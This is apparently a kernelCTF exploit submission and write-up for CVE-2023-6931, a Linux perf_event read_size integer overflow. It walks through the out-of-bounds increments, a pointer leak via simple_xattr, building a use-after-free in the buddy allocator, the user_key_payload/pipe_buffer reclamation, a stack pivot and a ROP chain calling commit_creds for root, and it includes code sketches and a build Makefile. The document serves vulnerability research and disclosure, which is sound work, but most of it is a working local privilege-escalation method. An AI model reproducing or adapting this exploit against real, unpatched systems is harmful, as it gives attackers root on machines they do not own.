Add kernelCTF CVE-2023-6931_mitigation #141

`pocs/linux/kernelctf/CVE-2023-6931_mitigation/docs/exploit.md`

# CVE-2023-6931

## Exploit Details

Exploit demo for CVE-2023-6931. Flag: `kernelCTF{v1:mitigation-v3b-6.1.55:1730717209:a3542a691dd87b35d0914ae264575ea3d6e888aa}`

## Overview

The vulnerability allows multiple out-of-bounds increments at controlled offsets past the end of a heap array. The LTS/COS exploit targets a fixed-size object, `netlink_sock`, allocated from the SLUB allocator. On the mitigation instance, however, protections such as `CONFIG_KMALLOC_SPLIT_VARSIZE` make that approach much harder, so to bypass them we carried out the exploit entirely within the buddy allocator, without relying on the SLUB allocator at all. Working only with the buddy allocator leaves many otherwise useful objects unavailable and adds complexity to the exploit. Also note that, although the vulnerability itself is a heap OOB write, we use it to construct a use-after-free (UAF), so the rest of the exploitation is effectively UAF exploitation.

## KASLR & Heap & VMEMMAP Leak

```c
for_each_sibling_event(sub, leader) {
	values[n++] += perf_event_count(sub);
	if (read_format & PERF_FORMAT_ID)
		values[n++] = primary_event_id(sub);
	if (read_format & PERF_FORMAT_LOST)
		values[n++] = atomic64_read(&sub->lost_samples);
}
```
The OOB increments and writes happen in the loop above, so the event count, event ID, and lost-samples values can all be used to tamper with adjacent objects.
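As a rough illustration, the overflowing event group can be built with `perf_event_open()` along the following lines (a minimal sketch rather than the actual PoC; the helper names and the sibling count are placeholders):

```c
#include <linux/perf_event.h>
#include <string.h>
#include <sys/syscall.h>
#include <unistd.h>

static int perf_open(struct perf_event_attr *attr, int group_fd)
{
	return syscall(SYS_perf_event_open, attr, 0, -1, group_fd, 0);
}

/* Leader with PERF_FORMAT_GROUP; each plain sibling grows the leader's
 * u16 read_size until it wraps, enabling the OOB loop shown above. */
static int build_overflowing_group(int nr_siblings)
{
	struct perf_event_attr attr;
	int leader, i;

	memset(&attr, 0, sizeof(attr));
	attr.size = sizeof(attr);
	attr.type = PERF_TYPE_SOFTWARE;
	attr.config = PERF_COUNT_SW_PAGE_FAULTS;	/* count is driven by page faults */
	attr.read_format = PERF_FORMAT_GROUP | PERF_FORMAT_ID | PERF_FORMAT_LOST;

	leader = perf_open(&attr, -1);

	attr.config = PERF_COUNT_SW_DUMMY;
	attr.read_format = 0;				/* siblings stay small themselves */
	for (i = 0; i < nr_siblings; i++)
		perf_open(&attr, leader);

	return leader;
}
```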

By repeatedly opening and closing events we can grow the event ID to an arbitrary value, use it to overwrite the size field of an adjacent `simple_xattr` object, and then read past that object's value to leak members of the neighbouring objects (`pipe_buffer`, `simple_xattr`), which yields the KASLR base, a heap address, and a VMEMMAP address.
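Once the size field of a `simple_xattr` has been inflated this way, the leak itself is just an ordinary xattr read that now returns memory past the original value (a minimal sketch; the tmpfs path and attribute name are placeholders):

```c
#include <stdint.h>
#include <sys/xattr.h>

/* Reads up to `out_len` bytes of the victim xattr's value; with the
 * inflated size field this spills into the neighbouring pipe_buffer /
 * simple_xattr objects, leaking kernel text, heap and vmemmap pointers. */
static ssize_t leak_neighbours(uint8_t *out, size_t out_len)
{
	return getxattr("/tmp/victim", "user.leak", out, out_len);
}
```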

## Make UAF

In kernels before v6.2, xattrs are managed with a `struct list_head` list. Therefore, if you corrupt the linked-list pointers of a `simple_xattr` object with the OOB write and make them point to a fake object, you can trigger a UAF.
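For reference, on the 6.1 target `simple_xattr` is laid out roughly as follows, so the list pointers sit at the very start of the object, followed by the name pointer, the size, and the inline value that later hosts our fake objects:

```c
struct simple_xattr {
	struct list_head list;	/* next/prev: the pointers corrupted by the OOB */
	char *name;
	size_t size;		/* the field overwritten during the leak stage */
	char value[];		/* user-controlled contents */
};
```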

```
Note

In kernels v6.2 and later, xattrs are managed in an rbtree via `struct rb_node`, sorted by name. A UAF can still be created there by choosing names with the right ordering and corrupting `rb_left` or `rb_right` to point to a fake object, so the `simple_xattr` technique remains valid on newer kernels.
```

Setting the event config to `PERF_COUNT_SW_PAGE_FAULTS` will measure page faults, so the event count can be controlled to a desired value by intentionally causing page faults.
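For example, the counter can be bumped by a chosen amount simply by touching that many fresh anonymous pages (a minimal sketch; error handling omitted):

```c
#include <stddef.h>
#include <stdint.h>
#include <sys/mman.h>

/* Each first write to a fresh anonymous page normally causes one minor
 * page fault, so this advances a PERF_COUNT_SW_PAGE_FAULTS counter by
 * roughly n (assuming transparent hugepages do not batch the faults). */
static void bump_counter(size_t n)
{
	size_t len = n * 0x1000;
	uint8_t *p = mmap(NULL, len, PROT_READ | PROT_WRITE,
			  MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);

	for (size_t i = 0; i < n; i++)
		p[i * 0x1000] = 1;

	munmap(p, len);
}
```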

I therefore used the event count to increase the `next` field of a `simple_xattr` by 0x30. The `next` pointer then points into the value field of that `simple_xattr`, where I can place whatever fake objects I want.

```c
int setxattr_copy(const char __user *name, struct xattr_ctx *ctx)
{
	int error;

	if (ctx->flags & ~(XATTR_CREATE|XATTR_REPLACE))
		return -EINVAL;

	error = strncpy_from_user(ctx->kname->name, name,
				sizeof(ctx->kname->name));
	if (error == 0 || error == sizeof(ctx->kname->name))
		return -ERANGE;
	if (error < 0)
		return error;

	error = 0;
	if (ctx->size) {
		if (ctx->size > XATTR_SIZE_MAX)
			return -E2BIG;

		ctx->kvalue = vmemdup_user(ctx->cvalue, ctx->size);
		if (IS_ERR(ctx->kvalue)) {
			error = PTR_ERR(ctx->kvalue);
			ctx->kvalue = NULL;
		}
	}

	return error;
}
```

```c
void *vmemdup_user(const void __user *src, size_t len)
{
	void *p;

	p = kvmalloc(len, GFP_USER);
	if (!p)
		return ERR_PTR(-ENOMEM);

	if (copy_from_user(p, src, len)) {
		kvfree(p);
		return ERR_PTR(-EFAULT);
	}

	return p;
}
```
As shown above, the setxattr path allocates a temporary buffer with `vmemdup_user()` to copy the value before the `simple_xattr` object itself is allocated, and kvfrees that buffer once the value has been copied. When an object of buddy order-2 size is kvfreed, the page contents are left intact, so by using this behaviour carefully you can fully control the data of whatever object is reallocated at that address, including its header, e.g. the UAF target object. I made heavy use of this temporary buffer in the exploit.
```c
((uint64_t *)value)[2] = xattr + 0x20000 + 0x40 - 0x30;
((uint64_t *)value)[3] = 0;
((uint64_t *)value)[4] = xattr + 0x20000 + 0x38 - 0x30;
((uint64_t *)value)[5] = 0x10;
```
The code above builds the fake object. When the `next` field of the victim `simple_xattr` is incremented by 0x30, it points at this fake object, and the fake object's `next` field is set to `xattr + 0x20000 + 0x40`, the value field of the target object to be UAF'd. `xattr` is the address of a `simple_xattr` object leaked earlier.
```c
((uint64_t *)value)[0] = xattr + 0x18000;
((uint64_t *)value)[1] = xattr + 0x18000;
((uint64_t *)value)[2] = leakname;
((uint64_t *)value)[3] = 0x3000;
((uint64_t *)value)[4] = xattr + 0x20000 + 0x80;
((uint64_t *)value)[5] = xattr + 0x20000 + 0x60;
((uint64_t *)value)[6] = leakname;
((uint64_t *)value)[7] = 0x3000;
((uint64_t *)value)[8] = xattr + 0x20000 + 0x40;
((uint64_t *)value)[12] = xattr + 0x18000;
((uint64_t *)value)[13] = xattr + 0x20000 + 0x40;
((uint64_t *)value)[14] = leakname;
((uint64_t *)value)[15] = 0x3000;
```
This is the target object used to create the UAF. Since the buddy allocator's free lists are Last-In-First-Out, if the target object is freed and then reallocated, the freed target page is recycled as the temporary buffer. So the value above is written and kvfreed immediately, yet the target object remains linked into the `simple_xattr` list through the fake object, and the use-after-free can be triggered.
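From userspace this whole stage is driven by `setxattr()` calls whose value size lands in the order-2 range, so every call stages our bytes in the temporary `vmemdup_user()` buffer described above before it is kvfreed (a minimal sketch; the tmpfs path, attribute name and ~0x3000 size are illustrative):

```c
#include <sys/xattr.h>

/* Push `len` controlled bytes through the temporary kvmalloc buffer:
 * vmemdup_user() allocates it from the buddy allocator (order 2 for a
 * value of about 0x3000 bytes), copies our data, and kvfrees it after
 * the syscall, leaving the data in place for whatever object is
 * allocated at that address next. */
static void stage_via_tmp_buffer(const void *data, size_t len)
{
	setxattr("/tmp/victim", "user.stage", data, len, 0);
}
```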

```c
bool __list_del_entry_valid(struct list_head *entry)
{
	struct list_head *prev, *next;

	prev = entry->prev;
	next = entry->next;

	if (CHECK_DATA_CORRUPTION(next == NULL,
			"list_del corruption, %px->next is NULL\n", entry) ||
	    CHECK_DATA_CORRUPTION(prev == NULL,
			"list_del corruption, %px->prev is NULL\n", entry) ||
	    CHECK_DATA_CORRUPTION(next == LIST_POISON1,
			"list_del corruption, %px->next is LIST_POISON1 (%px)\n",
			entry, LIST_POISON1) ||
	    CHECK_DATA_CORRUPTION(prev == LIST_POISON2,
			"list_del corruption, %px->prev is LIST_POISON2 (%px)\n",
			entry, LIST_POISON2) ||
	    CHECK_DATA_CORRUPTION(prev->next != entry,
			"list_del corruption. prev->next should be %px, but was %px. (prev=%px)\n",
			entry, prev->next, prev) ||
	    CHECK_DATA_CORRUPTION(next->prev != entry,
			"list_del corruption. next->prev should be %px, but was %px. (next=%px)\n",
			entry, next->prev, next))
		return false;

	return true;
}
```
The target object's value is laid out in this relatively complex way in order to pass the validation above: the entry can only be unlinked cleanly when `entry == prev->next && entry == next->prev` holds.

## UAF to RIP Control

At this point a UAF exists, but it is not complete yet. The plan is to reallocate the target object's address (now on the free list) as the object we want to overwrite, and then free the target object that is still linked into the `simple_xattr` list in order to overwrite that object. However, the moment the target address is reallocated, its contents are replaced by the newly allocated object, so the data satisfying `entry == prev->next && entry == next->prev` is clobbered, and the target object linked into the `simple_xattr` list can no longer be freed.

To solve this, we need an object whose contents are user-controlled, like `msg_msg`, and whose allocation can exceed 0x2000 bytes. With such an object, the target object's data can be re-established at the same moment the allocation is taken from the free list, so the list pointers are never destroyed.

The `user_key_payload` object satisfies these conditions perfectly. The target address is therefore reallocated as a `user_key_payload`, and the target object in the `simple_xattr` list is freed again. The freed target address is then reallocated as a `pipe_buffer` array, and the previously allocated `user_key_payload` is freed. Allocating one more `simple_xattr` reuses the freed `user_key_payload` address for the temporary buffer, which lets us freely rewrite the fields of the `pipe_buffer` allocated just before. Once `pipe_buffer->ops` can be overwritten, we have RIP control: I overrode `pipe_buffer->ops->release()` so that RIP is hijacked when the `pipe_buffer` is freed.
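The reallocation primitives used in this dance look roughly like the following (sizes, names and the pipe resize value are illustrative assumptions, not lifted from the PoC):

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <keyutils.h>
#include <unistd.h>

/* user_key_payload: a small header followed by fully user-controlled
 * data, so a payload of roughly 0x3000 bytes can reclaim the same
 * order-2 buddy region as the freed target object. */
static key_serial_t claim_with_key(const void *data, size_t len)
{
	return add_key("user", "reclaim", data, len, KEY_SPEC_PROCESS_KEYRING);
}

/* pipe_buffer: enlarging a pipe reallocates its pipe_buffer array with
 * kcalloc(); a large enough slot count pushes that allocation into the
 * same order-2 region as well. */
static int claim_with_pipe(void)
{
	int fds[2];

	pipe(fds);
	fcntl(fds[1], F_SETPIPE_SZ, 0x100000);	/* ~256 slots * 40 bytes of pipe_buffer */
	write(fds[1], "A", 1);			/* populate the first pipe_buffer entry */
	return fds[1];
}
```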

## RIP Control to ROP

Now we need to perform a stack pivot to the heap address to enable ROP.
```c
void (*release)(struct pipe_inode_info *, struct pipe_buffer *);
```
When `pipe_buffer->ops->release()` is called, the arguments are passed as above, so the address of the `pipe_buffer` being released ends up in rsi. Since rsi holds the `pipe_buffer` address, a gadget like `mov rsp, rsi ; ret` would be enough for ROP. I could not find such a neat gadget, however, so I combined `push rsi ; jmp qword ptr [rsi + 0x66]` with `pop rsp ; ret` to achieve the same effect.

Now rsp points at the `pipe_buffer` structure. However, the overwritten `pipe_buffer->ops` field lives in that header, so rsp has to be moved further along to leave room for a clean ROP chain; we do this by executing `pop rsp ; ret` once more.
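Putting it together, the fake `pipe_buffer` region ends up laid out roughly like this (the offsets past the header and the gadget addresses are illustrative placeholders resolved from the earlier leak):

```c
#include <stdint.h>
#include <string.h>

/* fake       : userland copy of the data written over the pipe_buffer
 * fake_kaddr : kernel address of that region (known from the leak)
 *
 * Chain of events on release():
 *   ops->release = push rsi ; jmp [rsi+0x66]   (rsi = &pipe_buffer)
 *   [rsi+0x66]   = pop rsp ; ret               -> rsp = &pipe_buffer
 *   qword 0      = pop rsp ; ret               -> rsp = qword 1
 *   qword 1      = &pipe_buffer + 0x80         -> ROP chain (next section)
 */
static void build_pivot(uint8_t *fake, uint64_t fake_kaddr,
			uint64_t push_rsi_jmp_rsi66, uint64_t pop_rsp_ret)
{
	*(uint64_t *)(fake + 0x10) = fake_kaddr + 0x1a0;		/* ->ops: fake table below */
	*(uint64_t *)(fake + 0x1a0 + 0x08) = push_rsi_jmp_rsi66;	/* fake ops->release */

	memcpy(fake + 0x66, &pop_rsp_ret, sizeof(pop_rsp_ret));	/* jmp [rsi+0x66] target */

	*(uint64_t *)(fake + 0x00) = pop_rsp_ret;			/* hop over the header */
	*(uint64_t *)(fake + 0x08) = fake_kaddr + 0x80;			/* new rsp -> ROP chain */
	/* fake + 0x80 onwards: the ROP chain shown in the next section */
}
```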

## ROP Chain

```c
rop[ridx++] = pop_rdi;
rop[ridx++] = 1;                          /* pid 1 (init) */
rop[ridx++] = find_task_by_vpid;          /* rax = task_struct of pid 1 */
rop[ridx++] = mov_rdi_rax_pop_rbx;        /* rdi = rax */
rop[ridx++] = 0;                          /* dummy rbx */
rop[ridx++] = pop_rsi;
rop[ridx++] = init_nsproxy;
rop[ridx++] = switch_task_namespaces;     /* switch_task_namespaces(task, &init_nsproxy) */
rop[ridx++] = pop_rdi;
rop[ridx++] = init_cred;
rop[ridx++] = commit_creds;               /* commit_creds(&init_cred) */
rop[ridx++] = kpti_trampoline;            /* swapgs_restore_regs_and_return_to_usermode, past the pops */
rop[ridx++] = 0;                          /* dummy values popped inside the trampoline */
rop[ridx++] = 0;
rop[ridx++] = (uint64_t)shell;            /* user-mode rip */
rop[ridx++] = rv.user_cs;
rop[ridx++] = rv.user_rflags;
rop[ridx++] = rv.user_rsp;
rop[ridx++] = rv.user_ss;
```
The ROP chain is shown above. I changed the namespace by executing `switch_task_namespaces(find_task_by_vpid(1), &init_nsproxy)` and then elevated privileges to root with `commit_creds(&init_cred)`.

Returning to user mode is done through `swapgs_restore_regs_and_return_to_usermode`. Since the function begins with a long series of register pops, we skip past that part and jump into the middle of the function.

---

When a `perf_event` has the `PERF_FORMAT_GROUP` flag set in its `read_format`, each event added to its group increases its `read_size`. Since `read_size` is a `u16`, adding a few thousand events can cause an integer overflow. There is a check in `perf_validate_size()` to prevent an event from being added to a group if its `read_size` would be too large, but the `read_size` of the events already in the group can also increase and is not checked. An integer overflow can be caused by creating an event with `PERF_FORMAT_GROUP` and then adding events without `PERF_FORMAT_GROUP` to its group until the first event's `read_size` overflows.

`perf_read_group()` allocates a buffer using an event's `read_size`, then iterates through the `sibling_list`, incrementing and possibly writing to successive `u64` entries in the buffer. Overflowing `read_size` causes `perf_read_group()` to increment/write memory outside of the heap allocation.

The bug was introduced in `fa8c269353d5 ("perf/core: Invert perf_read_group() loops")` in v3.16 and partially fixed shortly after in `a723968c0ed3 ("perf: Fix u16 overflows")`. It was fixed in `382c27f4ed28 ("perf: Fix perf_event_validate_size()")` in v6.7.

---

```makefile
exploit:
	gcc -masm=intel -static -o exploit exploit.c -lkeyutils

prerequisites:
	sudo apt-get install libkeyutils-dev

run:
	./exploit

clean:
	rm exploit
```